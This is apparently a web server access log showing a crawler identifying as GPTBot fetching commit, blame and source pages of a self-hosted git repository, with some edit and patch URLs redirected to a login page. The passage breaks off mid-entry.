"/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 11843] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12017] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17063] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:17:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:17:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:17:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" +[17/Feb/2026:17:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 11849] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 9779] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 9791] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" +[17/Feb/2026:17:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 11791] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 11795] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_v4.7.py" [Client 74.7.227.38] [Length 9790] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" +[17/Feb/2026:17:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14865] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:17:17:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13979] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" +[17/Feb/2026:17:17:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:17:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:17:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:17:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:17:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14254] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" +[17/Feb/2026:17:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:17:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" +[17/Feb/2026:17:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16523] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" +[17/Feb/2026:17:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/main.py" +[17/Feb/2026:17:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/main.py" +[17/Feb/2026:17:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15764] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/main.py" +[17/Feb/2026:17:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 15795] [Gzip 4.83] [Sent-to 192.168.0.250] "Mozilla/5.0 